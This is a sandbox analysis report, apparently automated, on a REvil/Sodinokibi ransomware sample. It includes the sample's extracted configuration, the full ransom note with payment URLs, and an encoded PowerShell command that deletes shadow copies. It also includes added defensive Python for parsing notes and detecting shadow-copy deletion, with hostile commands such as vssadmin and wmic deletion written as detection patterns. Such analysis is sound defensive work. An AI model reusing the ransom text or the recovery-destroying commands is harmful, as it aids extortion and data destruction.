Analysis

  • max time kernel
    145s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64
    arch:x86
    image:win7-20240221-en
    locale:en-us
    os:windows7-x64
    system
  • submitted
    08-03-2024 13:31

General

  • Target

    2024-03-08_4e1af0891819929521ae3d70afcbddbf_revil.exe

  • Size

    123KB

  • MD5

    4e1af0891819929521ae3d70afcbddbf

  • SHA1

    db49af0ef9a6e05c4cbe2c9edfaec3026ab26c8f

  • SHA256

    7c8055ed9d597c2abbfbb17e070e63fa3c8e337e9ea2169d0aaeb91b1fbd3bdc

  • SHA512

    3cb5f1c8923b2895d2df351eb566d778d952871d297e949108bed0aa82960b979093e419b1f0c3818e10c0a3ad57380b662284d85b6d582aab0ca3da3f9dce8a

  • SSDEEP

    1536:7DvcPmLThpshwVs5OE8yNcYQp+2ZZICS4AIjnBR561lQVMr3IgmffEbjQFOxZ:r4SVhaNcYM8gnBR5uiV1UvQFOxZ

Malware Config

Extracted

Family

sodinokibi

Botnet

$2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

Campaign

4085

Decoy

sandd.nl

digivod.de

southeasternacademyofprosthodontics.org

resortmtn.com

mdk-mediadesign.de

tetinfo.in

fayrecreations.com

ecpmedia.vn

physiofischer.de

highlinesouthasc.com

antenanavi.com

blog.solutionsarchitect.guru

deepsouthclothingcompany.com

coursio.com

quickyfunds.com

atmos-show.com

pawsuppetlovers.com

hokagestore.com

midmohandyman.com

mmgdouai.fr

Attributes
  • net

    true

  • pid

    $2a$10$CtL6MpBCOZZcR.aRU3GXp.pcFtg0joF6uPmmrKY0hC0o.x.alLtZ.

  • prc

    sqbcoreservice

    dbsnmp

    mydesktopservice

    outlook

    ocomm

    excel

    mydesktopqos

    isqlplussvc

    onenote

    tbirdconfig

    msaccess

    encsvc

    infopath

    steam

    thebat

    agntsvc

    sql

    visio

    wordpad

    winword

    dbeng50

    powerpnt

    firefox

    xfssvccon

    mspub

    oracle

    thunderbird

    ocssd

    synctime

    ocautoupds

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    4085

  • svc

    memtas

    mepocs

    backup

    sophos

    sql

    svc$

    veeam

    vss

Extracted

Path

C:\Users\t51o6cu44p-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension t51o6cu44p. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/30324C849872A42C 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/30324C849872A42C Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: skKhDaCYUjD/YXeXL3HQ990yGY5bq0Qhzxi5ZpT+fpunKSwAPelhuPtD4N6utoRi X6DWsrS7SIAXbNofJxTIl06MC1FBPrdLSYcVoUb96YZmjQkQmnvFrS+PZhT8K8AI NFfbHvbUvztvNI72E8+mgevhZqRlIDLgVS/KRneBWAslxtjmwef/8LDWSnYzFlC2 gWOCUP039NqrdOfJ7v25fOU+01bEU3BZE85djpJSfx5ooTXNOVKt2SLSOeWRPnbE rN25jAzrDxf0XLCkh/ny69SQYhDnh/jddr/ZnqOTQheVSFt13+X6LLrj9Qa911JG dakfgw3i2cAsVIT/E9VDV4QWSwOzvD0UArWoxcjoSoGLBxpElJ9EuXoAXIcZ+TAs b39LzSoaNltZAP+z71g9PI5awFnaihcF/j8WByJcQApYGM0aYrtZ5dnXMm483GQR pwiapSt8DiOWcefBM4lUZVB6MZCzkBNZT7hmBuJNurGvqnGTcTIbY0OTfFvffD9z mvM6UYXzc9mgJZf7PWkJryzgiiXSbJJK+S+Qtt6U4xK5v9IdLkqDlOh7Fwn1F7aE TUrLdT64OBuRjjfgsJBOOA7L2JGc0U6DndzlkkvA2Zw1a2PO+yNhpuPaqcFa7FNN yFgNLx/w16qyV6Y1OePPlq61PPKv0A7m+JVT0adDJ/zghhB/sFZx4qJaWrc67n00 dZI8RfeKMPm9f2XBp8J8FEFLK3fjvP+NW5qKAOGfbt1qk5QN1n9hHB0sMdaus50k Z9s0760r/REewKqj7pUgJWfGxArr9fp59apmMw0QCcanioPCKRKnRspsDFq5i6FY bM3B7W8AJB6QkjH9Py9uy+fRc6G2D0hlI0aBNmavjoYrywalDmG0WJcBF1O4oj4s c+X7gCq6g8YDLqvgPud6JFfWM5L3bg7LZyIBbrqFswCYzkY8ATql74qCKPVdSrKu Ts7Nv5H6YyobEsavW9BIEryX3yBeTgcF3LeKAIhRXA+p/V1qRWX3UcEeAMRUs52z UQVg8ACSxHigPUy1jtYWMty3eKPJ3jPxt44nsVK1cpkqeAjHlmKNtUgjZFoFgTti /coflujKOQGWrgnQQKGssAeu8S7EnM50Id5UnOboiqyYdrm5B29FLvl8FUHC+dDK BWyy09tsFahaqUfxmcHRbGPnemKwKa27QcmDByNwg4Teyk8bdBNVmlGMfkUymjeG dPxUTNUqRB0B4oPnZB9T5SttUXZyiMeFwuczSysbiH5pV126Ewh4YRpP2qxrGLdB HggfkiDydPJRi2tn+VIIwmcbB0vl9oAzMeCD9lU/VbgZrv0NSKYCv3N8rHAZvi0r KegxXmQltaxfohlqCQ0AwxlkCn6u7oT0V8AbjBP3qjGg4XoLpp/f6w== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/30324C849872A42C

http://decryptor.cc/30324C849872A42C
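The ransom_template above is a fixed text with three placeholders ({EXT}, {UID}, {KEY}) and the dropped note shows them filled in, which makes the note a parseable format: the extension names the suffix on every encrypted file, the UID is the victim identifier that must match in both payment URLs, and the Key blob is the base64 the operator's portal asks for. The parser below is an added example written for this report, not tooling from the sandbox or the sample. It assembles a constructed note from the template with the values of the extracted note (extension t51o6cu44p, UID 30324C849872A42C) and a labelled placeholder in place of the real key blob; the regexes, the RansomNote class and the function names are this example's own choices.

```python
"""Parse a Sodinokibi/REvil ransom note into the fields an IR team tracks.

Added example for this report; it is not tooling from the sandbox or the
sample. CONSTRUCTED_NOTE is assembled from the ransom_template above with the
values of the extracted note (extension t51o6cu44p, UID 30324C849872A42C);
the key blob is a labelled placeholder because only its base64 shape matters.
"""
import base64
import binascii
import re
from dataclasses import dataclass
from typing import Optional

CONSTRUCTED_KEY_B64 = base64.b64encode(b"constructed placeholder, not the victim key").decode()

CONSTRUCTED_NOTE = f"""---=== Welcome. Again. ===---
[+] Whats Happen? [+]
Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension t51o6cu44p.
[+] How to get access on website? [+]
1) [Recommended] Using a TOR browser!
b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/30324C849872A42C
2) If TOR blocked in your country, try to use VPN! But you can use our secondary website.
b) Open our secondary website: http://decryptor.cc/30324C849872A42C
When you open our website, put the following data in the input form:
Key: {CONSTRUCTED_KEY_B64}
-----------------------------------------------------------------------------------------
!!! DANGER !!!
"""

# Note filename convention seen in this report: <EXT>-readme.txt
NOTE_NAME = re.compile(r"(?P<ext>[a-z0-9]+)-readme\.txt$", re.I)
EXT_LINE = re.compile(r"all files on your system has extension (?P<ext>[a-z0-9]+)", re.I)
ONION_URL = re.compile(r"http://(?P<host>[a-z2-7]{56}\.onion)/(?P<uid>[0-9a-f]{16})", re.I)
CLEARNET_URL = re.compile(r"http://(?P<host>decryptor\.cc)/(?P<uid>[0-9a-f]{16})", re.I)
KEY_FIELD = re.compile(r"Key:\s*(?P<key>[A-Za-z0-9+/=\s]+?)\s*-{10,}")


@dataclass
class RansomNote:
    extension: str      # per-victim extension appended to encrypted files
    uid: str            # victim ID, identical in both payment URLs
    onion_host: str
    clearnet_host: Optional[str]
    key_bytes: bytes    # decoded {KEY} blob the operator's portal asks for

    def encrypted_name(self, original: str) -> str:
        """Name an original file carries after encryption (suffix appended)."""
        return f"{original}.{self.extension}"


def parse_note(path: str, text: str) -> RansomNote:
    """Extract the fields and cross-check the note's internal consistency."""
    name = NOTE_NAME.search(path.replace("\\", "/"))
    body = EXT_LINE.search(text)
    if not name or not body:
        raise ValueError("not a recognised REvil note")
    if name.group("ext").lower() != body.group("ext").lower():
        raise ValueError("extension in filename and note body disagree")
    onion = ONION_URL.search(text)
    if not onion:
        raise ValueError("no v3 onion URL in note")
    clear = CLEARNET_URL.search(text)
    if clear and clear.group("uid").upper() != onion.group("uid").upper():
        raise ValueError("UID differs between onion and clearnet URLs")
    key = KEY_FIELD.search(text)
    if not key:
        raise ValueError("no Key field in note")
    key_b64 = re.sub(r"\s+", "", key.group("key"))  # blob may be line-wrapped
    try:
        key_bytes = base64.b64decode(key_b64, validate=True)
    except binascii.Error as exc:
        raise ValueError(f"Key field is not valid base64: {exc}") from exc
    return RansomNote(
        extension=body.group("ext"),
        uid=onion.group("uid").upper(),
        onion_host=onion.group("host").lower(),
        clearnet_host=clear.group("host") if clear else None,
        key_bytes=key_bytes,
    )


def note_is_consistent(path: str, text: str) -> bool:
    """True when the note parses and every cross-check passes."""
    try:
        parse_note(path, text)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    note = parse_note(r"C:\Users\t51o6cu44p-readme.txt", CONSTRUCTED_NOTE)
    print(note.uid, note.extension, note.onion_host, len(note.key_bytes))
```

The cross-checks are the useful part when notes are collected from many hosts: a UID that differs between the onion and clearnet URLs, or an extension that differs between the filename and the body, means the file was edited or is not a genuine note, and the same UID appearing on several hosts ties them to one intrusion.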

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 31 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots. Here the sample reaches it through WMI rather than vssadmin: the base64 argument of the powershell.exe child in the process tree decodes (UTF-16LE) to Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, which deletes every existing shadow copy so files cannot be rolled back after encryption. That call is what brings vssvc.exe (the VSS service) and unsecapp.exe (the WMI callback host, COM-activated with -Embedding) into the process list.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-03-08_4e1af0891819929521ae3d70afcbddbf_revil.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-03-08_4e1af0891819929521ae3d70afcbddbf_revil.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1668
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
    PID:2328
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2844
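The powershell -e argument in the process tree is the one piece of the tree worth decoding by hand: PowerShell's -EncodedCommand takes base64 of the script encoded as UTF-16LE, which is why the blob shows an A every other character or so, and any abbreviation from -e up to the full flag name is accepted. The script below is an added example for this report, not part of the sandbox output or of the sample: it decodes that argument, then runs the decoded text (or a plain command line) through a small set of shadow-copy-deletion patterns. REPORT_CMDLINE is the command line recorded for PID 1668 above; CONSTRUCTED_CMDLINES and the pattern list are this example's own constructed inputs and choices.

```python
"""Decode PowerShell -EncodedCommand blobs and flag shadow-copy deletion.

Added example for this report; it is not part of the sandbox output or of
the sample. REPORT_CMDLINE is the command line recorded for PID 1668 in the
process tree above. CONSTRUCTED_CMDLINES are made-up inputs (not from the
report) used to exercise the matcher.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

REPORT_CMDLINE = (
    "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="
)

# Constructed test inputs (not observed in the report).
CONSTRUCTED_CMDLINES = [
    "vssadmin.exe delete shadows /all /quiet",
    "wmic shadowcopy delete",
    "powershell -NoP -enc "
    + base64.b64encode(
        "Get-CimInstance Win32_ShadowCopy | Remove-CimInstance".encode("utf-16-le")
    ).decode(),
    'powershell -Command "Get-Date"',
]

# Text that indicates Volume Shadow Copy destruction (ATT&CK T1490,
# Inhibit System Recovery), whether typed directly or hidden in a blob.
SHADOW_DELETE_PATTERNS = [
    re.compile(r"win32_shadowcopy.*\.delete\s*\(", re.I | re.S),
    re.compile(r"win32_shadowcopy.*remove-(wmi|cim)(object|instance)", re.I | re.S),
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"wbadmin(\.exe)?\s+delete\s+catalog", re.I),
]


def is_encoded_flag(token: str) -> bool:
    """True for every abbreviation PowerShell accepts for -EncodedCommand
    (-e, -ec, -en, -enc, ... up to the full name), case-insensitively."""
    t = token.lower()
    if t in ("-e", "-ec"):
        return True
    return len(t) >= 3 and "-encodedcommand".startswith(t)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None.

    PowerShell expects base64 of the script encoded as UTF-16LE, so every
    other byte of the decoded blob is 0x00 for an ASCII script.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_flag(tok):
            blob = tokens[i + 1].strip("\"'")
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def shadow_copy_deletion(cmdline: str) -> Optional[str]:
    """Return the (decoded) text that deletes shadow copies, else None."""
    script = decode_encoded_command(cmdline)
    text = script if script is not None else cmdline
    for pat in SHADOW_DELETE_PATTERNS:
        if pat.search(text):
            return text
    return None


def triage(cmdlines: List[str]) -> List[Dict[str, Optional[str]]]:
    """Summarise each command line: what it decodes to and whether it hits."""
    return [
        {
            "cmdline": c,
            "decoded": decode_encoded_command(c),
            "shadow_copy_deletion": shadow_copy_deletion(c),
        }
        for c in cmdlines
    ]


if __name__ == "__main__":
    for row in triage([REPORT_CMDLINE] + CONSTRUCTED_CMDLINES):
        flag = "HIT " if row["shadow_copy_deletion"] else "ok  "
        print(flag, row["decoded"] or row["cmdline"])
```

Matching on the decoded text rather than on the raw command line is the point: a rule that looks for the string vssadmin or Win32_Shadowcopy in process creation events misses this sample entirely, because the only thing visible in the event is the base64 blob. Note that the decoder deliberately refuses blobs that are not valid base64 or not valid UTF-16LE rather than guessing, so a garbled argument is reported as undecodable instead of producing a false negative silently.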

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      67KB

      MD5

      753df6889fd7410a2e9fe333da83a429

      SHA1

      3c425f16e8267186061dd48ac1c77c122962456e

      SHA256

      b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

      SHA512

      9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

    • C:\Users\Admin\AppData\Local\Temp\CabADED.tmp

      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    • C:\Users\Admin\AppData\Local\Temp\TarB016.tmp

      Filesize

      175KB

      MD5

      dd73cead4b93366cf3465c8cd32e2796

      SHA1

      74546226dfe9ceb8184651e920d1dbfb432b314e

      SHA256

      a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

      SHA512

      ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

    • C:\Users\t51o6cu44p-readme.txt

      Filesize

      6KB

      MD5

      20aadfbd7d1579fd8dc2ca89c35ee517

      SHA1

      78c35aa66871bc49973d9e46ee71872dfc9d87b9

      SHA256

      ba939738437a21c9a7ea934cdc2c59169991cdf4e02843cfab0057d121187dd9

      SHA512

      daf075604beb0fb38dd770be4c10617c2040dae62cd516b36b740a2e191fcd2dc64b62c818d1f05012654917a1e62963c5089828b482466ddeea53c1bd6d8e34

    • C:\Windows\System32\catroot2\dberr.txt

      Filesize

      192KB

      MD5

      28f0663c10b000f67af9e9ec2a7f86fb

      SHA1

      52b9589cf4879f8a137aa34b44f8ac311fe6de01

      SHA256

      677025f3fdfbb124c8a81053aa14017dcfc8dd838bc8bcc5cfc9ff36a1b526bb

      SHA512

      6a7157712e5bf7bb788177ce47e6933205978f5a899d4291d367c711bc09b394cb28f67267bf9f849044a2114abee709d93070339bfdbeb54b049ece2505548f

    • memory/1668-8-0x00000000028A0000-0x0000000002920000-memory.dmp

      Filesize

      512KB

    • memory/1668-12-0x00000000028A0000-0x0000000002920000-memory.dmp

      Filesize

      512KB

    • memory/1668-11-0x00000000028A0000-0x0000000002920000-memory.dmp

      Filesize

      512KB

    • memory/1668-10-0x00000000028A0000-0x0000000002920000-memory.dmp

      Filesize

      512KB

    • memory/1668-13-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

      Filesize

      9.6MB

    • memory/1668-9-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

      Filesize

      9.6MB

    • memory/1668-7-0x000007FEF5DC0000-0x000007FEF675D000-memory.dmp

      Filesize

      9.6MB

    • memory/1668-6-0x0000000002890000-0x0000000002898000-memory.dmp

      Filesize

      32KB

    • memory/1668-5-0x000000001B580000-0x000000001B862000-memory.dmp

      Filesize

      2.9MB

    • memory/1972-479-0x00000000012C0000-0x00000000012E2000-memory.dmp

      Filesize

      136KB

    • memory/1972-0-0x00000000012C0000-0x00000000012E2000-memory.dmp

      Filesize

      136KB